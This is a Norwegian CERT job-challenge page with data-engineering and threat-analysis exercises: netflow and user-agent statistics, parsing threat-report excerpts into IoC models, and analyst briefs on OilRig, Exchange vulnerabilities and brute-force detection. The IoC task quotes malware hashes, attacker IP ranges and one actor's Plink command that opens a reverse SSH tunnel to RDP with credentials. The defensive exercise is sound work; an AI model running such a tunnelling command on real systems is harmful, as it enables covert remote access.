VI LEVER FOR DATA!

Innehar du de riktige egenskapene?

En forutsetning for å kunne detektere trusselaktører sine handlinger i det digitale rom er å ha et datagrunnlag som gir verdi. Nedenfor har vi presentert et par relevante oppgaver knyttet til nettopp å skape et verdifullt datagrunnlag - merket: [DATENG].

Et annet essensielt fagområde knyttet til kampen mot avanserte trusler er taktisk analyse. Fagområdet innebærer å sammenstille og analyser tekniske funn, og å formidle betydning av analysene. Nedenfor har vi presentert et par relevante oppgaver for en taktisk analytiker – merket: [TAKANA].

Hva gjør du når du har klart en eller flere oppgaver? Hvis du vil, kan du sende inn svarene dine til post at cert.no. Her er det mest relevant hvordan du valgte å løse oppgavene og kom frem til dine svar. De beste besvarelsene får kanskje en liten oppmerksomhet i posten.

Løser du en eller fler av oppgavene i forbindelse med søknad på stilling hos oss, legges besvarelsen enten med som vedlegg i søknad eller du kan ta kontakt og avtale nærmere. Oppgavene er også et relevant samtaleemne på et eventuelt intervju og du får mulighet til å fortelle litt om hvordan du har løst dem.

Det å se detaljer og variasjoner, samtidig som man ser det store bildet - er blant egenskapene hva vi søker.

Se ikke skogen for bare trær!

[DATENG] #1 Prosentfordeling

I dette netflow-datasettet er det ønskelig å finne svar på følgende:
Hvor mange unike IP-adresser det er.
Hva den totale mengden bytes per IP, per retning er.
Hva prosentfordelingen av protokollene er.
Hva prosenfordelingen er blant portene, alle porter større enn 1024 kan omtales som high_ports.

Hadde det vært relevant å utvikle en annen datamodell?

Her er et utdrag listet, datasettet i sin helhet kan lastes ned her.

STARTTIME;SOURCE;DEST;PROTO;PACKETS;BYTES;DURATION
2019-09-03T05:00:03;8.8.8.8:53;10.23.35.133:64352;udp;1;78;00:00:00 2019-09-03T05:00:24;8.8.8.8:53;10.23.35.61:45153;udp;11;2191;00:00:00 2019-09-03T05:45:06;8.8.8.8:53;10.23.35.60:12789;udp;1;103;00:00:00 2019-09-03T05:48:26;8.8.8.8:53;10.23.35.61:54513;udp;11;2191;00:00:00 2019-09-03T05:01:03;8.8.8.8:53;10.13.232.89:29981;udp;1;235;00:00:00 2019-09-03T05:11:11;10.23.35.61:26653;8.8.8.8:53;udp;11;742;00:00:00

[DATENG] #2 Ustrukturert data

Følgende data mangler struktur for både at operatører skal kunne jobbe med opplysningene her, men også for å kunne gjøre videre automatiske korrelasjonsoperasjoner. Det er behov for å lage en modell som blant annet inneholder egenskapene kilde, navn, multivalue IoC og IoC-type, melding.

Det er ønskelig å se løsningen som parser de nedenforstående paragrafer og populerer modellen, for deretter å ha en programatisk løsning for å hente ut like IoCer på tvers av oppføringene med hvilket IDer som er berørt.

Unit42:ironnetinjector - When an IronPython script is run, it is loaded into the IronPython interpreter. In the IronPython script, the embedded .NET injector (SHA256: a56f69726a237455bac4c9ac7a20398ba1f50d2895e5b0a8ac7f1cdb288c32cc) and ComRAT DLL payload (SHA256: a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56) get decoded and decrypted. This is done with the Python Base64 module and the RijndaelManaged class from the C# cryptography namespace. The decryption key is passed as an argument to the IronPython script. The Rijndael initialization vector (IV) is stored in the script. Next, the .NET injector gets loaded into the IronPython process with the help of the Assembly.Load() method of the C# Reflection namespace. That’s possible because IronPython itself is a .NET assembly and thus its process already contains all the .NET runtime libraries.
Unit42:bumblebee-webshell-xhunt-campaign - The commands listed in Table 2 in the Appendix also show the actor using Plink (File: RTQ.exe) to create an SSH tunnel to an external IP address (IP: 10.13.232[.]89), as seen in the following command:
echo y | c:\windows\temp\RTQ.exe 10.119.110[.]194 -C -R 0.0.0.0:8081::3389 -l bor -pw 123321 -P 443
The IP address overlaps with other related infrastructure that we will discuss in a later section of this blog. Most importantly, the username and password of bor and 123321 used to create the SSH tunnel overlaps directly with prior xHunt activity. These exact credentials were listed within the cheat sheet found within the Sakabota tool, which provided an example command that the actor could use to create SSH tunnels using Plink. We believe the actor used the example command from the cheat sheet as a basis for the commands they used to create the SSH tunnels via BumbleBee.
Fireeye:UNC1945 - PUPYRAT (aka Pupy) is an open source, multi-platform (Windows, Linux, OSX, Android), multi-function RAT (Remote Administration Tool) and post-exploitation tool mainly written in Python. It features an all-in-memory execution guideline and leaves very low footprint. It can communicate using various transports, migrate into processes (reflective injection), and load remote Python code, Python packages and Python C-extensions from memory.(MD5: d5b9a1845152d8ad2b91af044ff16d0b (SLAPSTICK)) (MD5; 0845835e18a3ed4057498250d30a11b1 (STEELCORGI)) (MD5: 6983f7001de10f4d19fc2d794c3eb534) (IP: 46.30.189.0/24) (IP: 66.172.12.0/24)

[DATENG] #3 Statistikk

I dette datasettet hentet fra webtraffik med fokus på User-Agents, har vi følgende problemstillinger til deg:
Hvor mange oppføringer er det totalt?
Datasettet inneholder syntaksfeil, hvilke linjer?
Hvor mange unike User-Agents eksisterer i datasettet?
Hvor mange unike User-Agents har en forekomst som er større enn den gjennomsnittlige forekomsten?

Her er et utsnitt av datasettet, datasettet i sin helhet kan lastes ned her.

"time","UserAgents","Protocol","method"
"2021-03-04T17:35:37.979+0100","Mozilla/4.0 (compatible; ms-office;... "2021-03-04T17:35:02.911+0100","Mozilla/4.0 (compatible; MSIE 6.0;... "2021-03-04T17:35:01.587+0100","Mozilla/4.0 (compatible; ms-office;... "2021-03-04T17:35:01.568+0100","Mozilla/4.0 (compatible; ms-office;...

[DATENG] #4 Visualisering

Nøstede-koordinatlister - hvordan blir din visualisering?

{{5,65 5,1 26,1 39,3 46,7 49,13 52,18 53,27 53,35 52,45 48,52 44,56 39,60 32,63 26,65 5,65}{16,55 16,10 28,10 34,13 37,16 40,20 41,27 41,36 39,45 36,49 31,53 26,55 16,55}}
{{93,65 84,63 80,61 77,59 74,56 71,53 69,48 68,42 68,30 69,21 71,14 74,9 82,3 86,1 93,0 104,1 109,5 113,8 117,14 119,22 119,31 119,41 116,50 113,56 109,61 104,63 99,64 93,65}{93,55 86,51 84,49 81,45 81,38 81,26 82,18 87,13 90,10 95,10 100,12 104,16 106,22 107,27 107,36 106,42 104,47 103,50 100,53 98,54 93,55}}
{{132,65 195,65}}
{{229,64 218,64 218,41 197,1 210,1 223,30 238,1 250,1 229,41 229,64}}
{{288,65 279,63 275,61 272,59 269,56 266,53 264,48 263,42 263,30 264,21 266,14 269,9 277,3 281,1 288,0 299,1 304,5 308,8 312,14 314,22 314,31 314,41 311,50 308,56 304,61 299,63 294,64 288,65}{288,55 281,51 279,49 276,45 276,38 276,26 277,18 282,13 285,10 290,10 295,12 299,16 301,22 302,27 302,36 301,42 299,47 298,50 295,53 293,54 288,55}}
{{353,65 345,64 340,63 335,60 333,56 331,50 330,44 330,1 341,1 341,47 344,52 347,54 350,56 356,55 360,54 363,51 365,45 365,1 376,1 376,42 375,51 372,57 369,60 365,63 359,65 353,65}}
{{392,65 455,65}}
{{465,64 465,1 504,1 504,10 477,10 477,27 503,27 503,36 477,36 477,55 504,55 504,64 465,64}}
{{556,64 540,64 521,1 535,1 549,51 563,1 576,1 556,64}}
{{595,64 595,1 634,1 634,10 607,10 607,27 633,27 633,36 607,36 607,55 634,55 634,64 595,64}}
{{656,65 656,1 671,1 692,46 692,1 702,1 702,65 688,65 666,18 666,65 656,65}}
{{717,65 780,65}}
{{830,61 821,65 810,65 799,62 792,57 787,51 786,43 786,34 785,27 787,18 790,13 796,6 800,2 808,0 818,1 829,3 829,14 825,12 818,10 813,10 805,13 801,18 798,24 798,35 800,46 803,50 809,54 818,55 824,53 830,51 830,61}}
{{879,64 868,64 868,41 847,1 860,1 873,30 888,1 900,1 879,41 879,64}}
{{917,65 917,1 940,1 948,2 953,4 955,6 957,10 958,14 958,18 957,22 956,25 954,27 952,30 949,31 954,32 956,34 958,36 960,38 961,42 961,48 960,52 958,56 954,60 948,63 941,65 917,65}{929,28 929,11 938,11 943,13 945,16 945,20 944,24 941,26 939,28 929,28}{929,53 929,36 938,36 943,38 945,41 945,45 944,49 941,51 939,53 929,53}}
{{985,64 985,1 1024,1 1024,10 997,10 997,27 1023,27 1023,36 997,36 997,55 1024,55 1024,64 985,64}}
{{1046,64 1046,1 1068,1 1076,2 1082,4 1085,7 1087,11 1089,18 1088,23 1087,26 1085,29 1083,31 1079,32 1075,34 1079,37 1081,39 1093,64 1079,64 1071,44 1068,40 1064,38 1058,37 1058,64 1046,64}{1060,34 1060,11 1068,11 1074,12 1076,14 1078,16 1079,19 1079,23 1077,27 1076,30 1074,32 1070,33 1067,34 1060,34}}

[TAKANA] #1 Trusseletterretning for det digitale rom

Nedenfor er det listet en del TTPer (tactics, techniques & procedures) som blant annet benyttes til å beskrive trusselaktørenes handlemåter. En samling av slike TTPer kan dermed være med å beskrive en eller flere trusselaktører.

Hvilke trusselaktør eller gruppering kan beskrives med disse TTPene fra Mitre Att&ck:

Standard Encoding
rundll32
ChinaChopper
Archive via Utility
ASPXSpy

[TAKANA] #2 Forestående nettverksoperasjon

Vi har mottatt varsel om at trusselaktøren OilRig har fattet interessert for våres sektor, og at en nettverksoperasjon kan være nært forestående.

Utarbeide et beslutningsgrunnlag i rapportform til ledelsen hvor du du fremstiller trusselaktøren OilRig, med anbefalinger om hvordan vi kan forhindre og avdekke forsøk fra denne trusselaktøren.

Rapporten skal maksimalt være på to sider

[TAKANA] #3 Tekniske systemsårbarheter

Mange IT-løsninger har tekniske sårbarheter, og når disse blir offentlig kjent får de som oftes en CVE-ID og i noen tilfeller gis sårbarheter egne navn. Et eksempel på at sårbarheter har fått egne navn er heartbleed. Heartbleed var en svakhet i krypteringsbiblioteket OpenSSL. En annen it-løsning som i løpet av 2021 har vært utsatt for sårbarheter er Microsoft Exchange.

Utarbeid en presentasjon som tar for seg sårbarhetsløpet til MS Exchange i 2021. Presentasjonen bør gi driftspersonell en formening om eventuell viktighet, og hva de bør ha fokus på. Maksimalt 5 slides, slidene bør inneholde manus-notater.

[TAKANA] #4 Deteksjonslogikk - råkraftangrep

Vi har trolig tjenester som kan bli utsatt for råkraftangrep (bruteforce) og disse bør sikres. Utarbeide et dokument “deteksjonslogikk for råkraftangrep” som kan benyttes til både et beslutningsgrunnlag av ledelsen for prioritet og ressurser, og av teknikere som skal håndtere problemstillingen. Dokumentet bør da inneholde en forklaring på råkraftangrep for ledere, en forklaring som teknikere kan nyttegjøre seg av for herding av sine systemer, og forslag på hvordan slike angrep kan oppdages.

Dokumentet skal maksimalt være på en side.

Cookies

Du er: 0b90aa85e89d02e27f6e15b08c5cc4d6 CCBot/2.0 (https://commoncrawl.org/faq/)